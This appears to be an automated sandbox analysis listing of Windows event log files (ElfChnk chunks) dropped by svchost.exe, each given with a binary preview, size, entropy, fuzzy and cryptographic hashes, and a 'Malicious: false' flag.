                                                                                                    Preview:ElfChnk.....................................@(...)....6.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..H...........o...b.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.673905884872378
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:y/hDIEQAGxIHIFIWHIft6IT/nIGIEI8pIftaIT/JIdIWIyIILIQIhI0vcI7Iftq4:y/ZxGuTcri
                                                                                                    MD5:6D7EB70B742BCD0F68E8AE544D5FCDA0
                                                                                                    SHA1:BC17072C6DADDEF75C444A867F41536E94059CF4
                                                                                                    SHA-256:E9778FB60EF1EEB0206583DEDC42109930AD5FF8F7D06340BAE138945B4E066B
                                                                                                    SHA-512:680250D6A41016FADBF39445FBD295E679E5960565DF10D65A25DEDE1F0769B64666DAD80D6A3984D56DA1E7B5479990FC22502118FE5A631904C532235EC12E
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.T...............T.............................V....................................................................}e.........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1........................................<...............(..........**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9026062677089721
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:cmh6iIvcImIvITIQIoIoI3IEIMIoIBIjIIQIYIRIEMIO4IvIPIAIII:cmoxDJ
                                                                                                    MD5:5804920425A4E3269D7609A5DBD75403
                                                                                                    SHA1:AA220AEE0488F93D9441A1DE1A816E00768168B3
                                                                                                    SHA-256:1FF4DAFDF8B5CD5858291753C7E43EF28567F1F802A8723B5CF3859DF59D9EF5
                                                                                                    SHA-512:6AEB374908A7FD11C330BF7814E14B7F48250CBA2A51BCA80A8ABB14D3A56CA7936939ED7F55519C18DEF8C6070B739ADD83AB2480D9936BA8C1A526BC215B90
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................x'...(....RX....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................^...........**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.410240819170099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:K4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13I:I
                                                                                                    MD5:0A7DC618A17C5DBFEE9CDEF8D5FE0558
                                                                                                    SHA1:2E5C6E3A39FD664CD9297B99721B237563EC9DAF
                                                                                                    SHA-256:BC74AF16EE61EB5932C717BDF60997E1CEFBDEC8AD73B600F84F8EE045D9498E
                                                                                                    SHA-512:A97C4725E2FEC63E5280A9E452F21D77753BAF1D53D167D892D2B03ED1875AABC1D7BACC6497E6E3393CBC72AAD7EC78659DBC77C041E419F329243D587D3256
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................h...x............................................................................8..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.342099733536711
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:amhKy4ynyyUyLZyzGywyByLlayoB/X/n/P/knJ/8i/y/R/nutDxfPKDU1xV8k+uN:57RM5utDBjV8k+u7extHpoVWW
                                                                                                    MD5:46D0CB21E60A17FD75DE6877B17FEE8D
                                                                                                    SHA1:70593CD41E5FBF14897F454655C4C7F7E0DBC5D8
                                                                                                    SHA-256:88D10C37173A612C7CFD32607DF18A0B1E30E7B26FDCB8BB8E648ED7598B801D
                                                                                                    SHA-512:A209B594EDA61A57C19D33124A6E87A4C97048556D69FA20E1B9646A89686CA955C8D4F5A1A781D5041C9C2613456932F6F1266639C32AE24E1D55CE6520AFF1
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.................g.......o...............@...5TTd....................................................................L.(.................2...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..`...g.....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.79726221571279
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xhtKxPK3KqK+K8K0KoKaKXKrK5iaKIBKsGKiKX7EKhKRDKIKVKZKO1KFKEqKEcKF:xKDicqQMGXol5lwtNCcWk+i6gWkjG
                                                                                                    MD5:CD255DB442AA16A78C4134BFD501DBEB
                                                                                                    SHA1:F7F2E1C3C270809CD86EB517B320FC6678423E0A
                                                                                                    SHA-256:C70A313D47A75332F16ECCE8A0080B02A626AF58863339D0BB85C20D82A09DBE
                                                                                                    SHA-512:85CB0339DE8405ED8BD1F6A5F65E2A2FD4445E18258E213D8C613115B054F3CA31B5B994D5A360D0F097A966E8DA40E6FEE2B5CF1880C9119A288B36D0C06E24
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.0.......L.......0.......L...........xI...K...;6.....................................................................`..}................p...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................OC..........O......._'../........................"............... ..........................&........-..**......0........D.c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.8494451744269971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yhP8o8Z85848V8M8g8D8R8E8y8eE8U8+8G8h8M8H8:yy
                                                                                                    MD5:2806C45E09D18AC03F69A60B643D1D38
                                                                                                    SHA1:9FB0A7030248B1D8945BFBD094C21D20C168E03B
                                                                                                    SHA-256:380D630B4DEB1FDA4A304608F302D6D6312DF2DAE68FB96B87682F8C742B150D
                                                                                                    SHA-512:943A7B00809896A5EF3F6309361C4B47613658E964C1FB53C82D3B6F15DCB1CFD4C0D1B14BB79B4719D4F4573879BA267531CBF82A067AFA7CEDE0942C25014C
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................($...%..q..+....................................................................x...........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................................v...........**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.8026235921669143
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:QXhicUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMj1:QXMcnS
                                                                                                    MD5:AF82C2F6662BD0C2A3B26A6B94E2FF8E
                                                                                                    SHA1:19C69A2AD624397A102A32C3F9BD25864F07541E
                                                                                                    SHA-256:F8BEB10C76C175CD844B48C26404FF5F173C5A89BB98A6CE607BAD10E9F07C4A
                                                                                                    SHA-512:AFF2340499228D52A0FCDDDCFCFC7BFD50B0B0FF9195AC3937EA4D74858BDE1E63318FF6152545F5B66E6FE60E31AFA0B9252191BC02A819D446FD6E2064222B
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................T...V....5....................................................................N.u.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................O............9..........**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.646898922421028
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:W0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O4aui1J6eJOQJMBJXTO:ecEr
                                                                                                    MD5:145ABA555E75A6F6BCE761B8A1D66D12
                                                                                                    SHA1:FD678C95EE1F5A0F8647815A50E1C0A92DA59121
                                                                                                    SHA-256:93D3212BFD60211C4ABBF909B98348B667F5E6C87742E4E415739A306060BF3B
                                                                                                    SHA-512:573E6C765A4CDFEB74517DDD1A39658F72290F0124AC33CEDB6A13AEDB497966FD3B9857E02B841C127E2302568D74B043D481FCD0159AFD84D11CDFDEA3E4F9
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........G...............G...................{1U.....................................................................l."t................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&....]..................................................................................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.314772956855766
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zhFChtCgoCzCRCFCZC4MCyCcC7CgzCiCoCD24F2a2EO2M2w2s023C8CJCpCFICph:z1oNT2l
                                                                                                    MD5:9423B3B7DB9AD9CA42101616F969F710
                                                                                                    SHA1:3C309A9F6DFA428272F9696A8EB272F56290156C
                                                                                                    SHA-256:A3CF17833945EA911C21A538513A69E61CB21F41178CEDC5A09BC534CE647BAC
                                                                                                    SHA-512:806D3319672309356CA414AA212009B217B2923AB5AC7047D3F6CCE7F417A0928CF705C89D519E0236E435DD8158124E5DA31DE12E6CB4A7834FE4FAE85BD91E
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.....................................0...8...@........................................................................2..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..0...............c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.493506047116424
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:scPLvjwmE+ukWvw75NFyBo/QbG7YX1cchg52p5cfFSYl8ZAgWCx/i1UkHAbZ7NG5:scPLvjwmE+ukWvw75NFyBo/Qq7YX1ccs
                                                                                                    MD5:8AD42A99D4F9F55E09B25BCD80C1B117
                                                                                                    SHA1:6D1A1595D74941BCFABB526D013675ACDF06D896
                                                                                                    SHA-256:1926D9FD3CCFD55DF5D27BCEDE5E07862F8E3D15DDFE2CE3C4016BCD875FA1D2
                                                                                                    SHA-512:6D88E42D47BBE4F7F7992754D17A0FC821794F2CF1829EA2D52F5FA86719A7034C921E38069C28B98F882B9D4E035C43E54F9F15C0351DDE7F4FAE8B1E58DA93
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......... ............... ............|..x~.....2........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&............................................................................I..........**..............XH^...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.468156688270642
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:SHryIS7VKbG5jQxyyyEYVJd4wG8soU5FlLUp50ihVdC63Isgkl+mF6jutzpfs1na:SHryIS7VKbG5jQxyyyEYVJd4wG8soU5q
                                                                                                    MD5:6A684BB08BED0A99D8B46DAB3E2BC8CD
                                                                                                    SHA1:9B9C5D5D8A6A6EFE132DCE9D0178D44C0444BAAB
                                                                                                    SHA-256:D4D3D78CA64CC055109145D9E36E783DF12818E99202494769306D5BB875008F
                                                                                                    SHA-512:385EEC6EAE048EB1306AA225E8589B20E86B382EAF3F139F0E74C3D2B11B1EA9D9D2775AF27D0322D1CEA1D6486E87FABDE9D3AE2C284D6F1EC5473241373177
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........Q...............Q...........@.......(.Em....................................................................L.FP................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................i.......9..............................&...A.......**..............B.D.c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66768
                                                                                                    Entropy (8bit):4.497022429338274
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:eB7z0Jrhl787V7s7y7s7M787/7m7C7p74797kc7h7s7b7Y717c7v7b7v7vV7p73g:n1t/qMWVh
                                                                                                    MD5:C0B84966696D7679B791506977B2CDD3
                                                                                                    SHA1:FFEAF4096336A62AE5E125CF01922BF91B2BF1E6
                                                                                                    SHA-256:B883440EBE75A840A50484602B38F415B5FDB69C16EBFA71B36313A919F981FE
                                                                                                    SHA-512:39CA909074D6F15B3D0881024AC6DAF5535F08A18045FD4656DAB9CB6583F8BB36AC70CE7245327235B3FD6CEF261F5A800DA19182941FB70840814D82F07D50
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........................................`....-SE.....................................................................@.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-(..............E!..s...........&...............................................................-&..........f@..........**...............h...........F..f@..............................................................f.......~.....!.....N..........@.h........c....S..c.......x#...........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n.B.....K..p...1.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n./.O.p.e.r.a.t.i.o.n.a.l...Q...s...................$...T.~.S.t.a.r.t.S
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.513517084056383
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:5hc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinN:56Ovc0S5UyEeDgLLyfrlB8Q54GJYFN
                                                                                                    MD5:86328FE8E0D9FD764909382ABB71A55B
                                                                                                    SHA1:BD50852F94323E1C42CEF0A81370253793455128
                                                                                                    SHA-256:AE09BDE973314507341F7545AAF46CD5BA9FF87C65A7B348FB6B7A504B2C311A
                                                                                                    SHA-512:A03AA12F12CF7B2F2759713CB7821E9AF5F69BB942E484E482491123A317C31F755CD560396A13ECDB4C8AC987587FC76F7F67CA470C3778FFE4E3A7CCB666D6
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........I...............I...............x...d&B.......................................................................j................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................w...................._..........**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9111169569250959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:BhGuZumutu4uEu5uOuDuyb2uPu1uyuKtuLujuVgquau7utu:Bb+
                                                                                                    MD5:65EE06ED82C92882C0B30DE9C59BDF0F
                                                                                                    SHA1:763B70DC2B63BF0FE3985E3C89619CB87CE599DC
                                                                                                    SHA-256:A55AC3B30BF0CECB159D885725F72860E93F7AF93D56333DFBDDE61B4F09F0A1
                                                                                                    SHA-512:31C99AA41C4C6313EA60E4AA50C54757C7796CD5F1805CFD2C530C5266E2475B975D1458A0D9B443CE47139D8F3FB68276A04EEE642354E18BD95C7CCB2C5751
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................'..@)..........................................................................A2..................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................................>...........**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.211809501239778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:HhzASWeASbAXKShA6A7ADDAsbAnUASZNASIAKLAyAdyqA1AnA2AOA6AGAeArAQAL:HgRKS3MOTi+KLN6gCvh
                                                                                                    MD5:DF78BC97D0CB011E784341C7E29E589A
                                                                                                    SHA1:0D7F5DF4F83A068FF3F34BA96C44D782F7C0B4B6
                                                                                                    SHA-256:BF2B6E050D1B4663A92E4BE497DD72165DA2B389BCE5488FEF13A79D24011C80
                                                                                                    SHA-512:E5F1016AF40DC3A7DBDDC0201A67E64451618DC66D45CFF3EF305FB0FEEC649FD7A4595A3C1E4B75894806B7A3910B521C1BB54CF11C232A2A118AC619451183
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.B.......Y.......B.......Y............2...4...........................................................................k}.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................M"..........................................................................................................&...........**......B.......m=.hc.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.0004944299782244
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Uvh68psqp9hp9wp9Dp9ep9Zp9Ep9Lp9Wp9dp9gp9np9ap95p9op9Dp9yp9pp9Ip2:Uv4w
                                                                                                    MD5:17E1F6A923B394468B7E7AC13A6D5A70
                                                                                                    SHA1:6BB9BD876DA67DD7E91409B7B54D87BD9466E616
                                                                                                    SHA-256:8209D19A5F3BB68414DBC36A6697C890C1A6F8D2EB94631D0B6C890BFC04FC8D
                                                                                                    SHA-512:EB497377962021D265A243880AED479A9374B83834B47300FA5879E0C5D825F3D1C8053648E6A4F6F232F08495D5A33D9137BEBBB7FAFB1F182CE636D7AB706D
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.~...............~....................p...s....H.....................................................................?...........................................<...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**......~..........nc.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.250004965973641
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/hbDp2d5p6vpl9pjxV1pHZpzHpHsIpb2Vpsdp0gpjUqpktzpOQpIApRhVpbM5pL4:/faDh1VvpE0Y5RA8sQsu
                                                                                                    MD5:0DDDE872D2B30C75A2EC756FA940A755
                                                                                                    SHA1:8D254C1A7C4BAD2FB69ED7FB0CC377A2E53F65B0
                                                                                                    SHA-256:CC9291C1282B20AD26270C0C532A742B9504E21463553DD16B3A13145045E7AE
                                                                                                    SHA-512:D360847D79623B9509DE27CBB2A418EED679A205B0A0D08D3731BEF52425D9C7BE60D8330F9E7C08ACB21C0279F763EECCA1302B461EDA9CCF2B694DA0335784
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................9..X;...=........................................................................<.................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................I.......................................&...........**..............8..]c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.3289207454813916
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yhwCCRzCaCkClCzCYC/CyCVCGCMCvCtlCaf2Ca9CaECaAzCaFECalCa9CafCaWCa:yKFD
                                                                                                    MD5:0F17EC060875E9ABCD98D78F39799A40
                                                                                                    SHA1:CDF257B9028997705838873AC77FCC8BF60E0825
                                                                                                    SHA-256:40D2379CA92439C3B28964CB89E09C9191AE017543BA3E77B626702517FA20CC
                                                                                                    SHA-512:64A0D82DDBE97D80513F4E20D7CE1031AF279C1DD03E2BEDE5C37F77D369B3CF8BFD1682C648C62BF7369EB5FF9EE2E1B72A9ADA2F30490B9BF7F4C464585C89
                                                                                                    Malicious:false
